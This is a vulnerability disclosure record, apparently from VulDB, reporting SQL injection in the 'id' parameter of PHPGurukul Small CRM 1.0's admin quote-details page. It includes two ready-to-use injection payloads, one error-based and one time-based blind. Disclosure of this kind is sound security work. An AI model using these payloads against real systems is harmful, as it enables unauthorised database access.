| Title | phpgurukul Small CRM in PHP 1.0.0 SQL Injection |
|---|
| Description | In the file 'quote-details.php' located at '/crm/admin/quote-details.php?id=1', there is a possibility of performing SQL injection on the '?id=' parameter. This allows attackers to inject malicious SQL code into the query. For example, if the '?id=' parameter is set to:
For error-based:
Payload: id=1' AND (SELECT 7086 FROM(SELECT COUNT(*),CONCAT(0x7171706a71,(SELECT (ELT(7086=7086,1))),0x716a717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- XHye
For time-based blind:
Payload: id=1' AND (SELECT 1541 FROM (SELECT(SLEEP(5)))yavg)-- LqgH |
|---|
| Source | ⚠️ https://phpgurukul.com/small-crm-php/ |
|---|
| User | Havook (UID 71104) |
|---|
| Submission | 12/26/2024 20:15 (2 years ago) |
|---|
| Moderation | 12/28/2024 09:35 (2 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 289661 [PHPGurukul Small CRM 1.0 /admin/quote-details.php ID sql injection] |
|---|
| Points | 20 |
|---|